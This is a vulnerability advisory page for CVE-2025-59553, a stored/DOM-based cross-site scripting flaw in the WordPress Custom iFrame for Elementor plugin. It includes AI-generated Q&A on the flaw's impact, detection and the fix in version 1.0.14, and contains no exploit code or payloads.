CVE-2025-59553
BaseFortify
Publication date: 2025-09-22
Last updated on: 2026-04-23
Assigner: Patchstack
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| patchstack | custom_iframe_for_elementor | * |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability is a Cross Site Scripting (XSS) issue in the WordPress Custom iFrame for Elementor Plugin (versions up to 1.0.13). It allows attackers to inject malicious scripts, such as redirects, advertisements, or other HTML payloads, that execute when visitors access the affected website. The vulnerability is DOM-based and requires only contributor-level privileges to exploit. It falls under the OWASP Top 10 category A3: Injection and has a CVSS score of 6.5, indicating a low severity impact. [1]
How can this vulnerability impact me? :
Exploitation of this vulnerability can lead to unauthorized script execution on your website, which may result in malicious redirects, unwanted advertisements, or other harmful HTML content being displayed to your visitors. Although the impact is considered low severity, attackers could use this to compromise user experience or potentially steal information. The vulnerability requires contributor-level privileges to exploit and is unlikely to be widely exploited, but automated attacks are possible. It is recommended to update to version 1.0.14 or later and consider professional incident response and server-side malware scanning if compromised. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection of this vulnerability involves monitoring for suspicious script injections or unexpected HTML payloads in the web pages generated by the Custom iFrame for Elementor plugin (versions up to 1.0.13). Since the vulnerability allows DOM-based XSS, you can look for unusual script tags or redirects in the page source. Network detection could involve inspecting HTTP responses for injected scripts. However, no specific commands are provided in the available resources. It is recommended to perform server-side malware scanning and professional incident response if compromise is suspected. [1]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include updating the Custom iFrame for Elementor plugin to version 1.0.14 or later, where the vulnerability is fixed. Additionally, Patchstack offers virtual patching (vPatching) as an immediate protective measure that auto-mitigates the vulnerability even before official patches are applied. Users should also ensure timely updates and consider professional incident response and server-side malware scanning if a compromise is suspected. [1]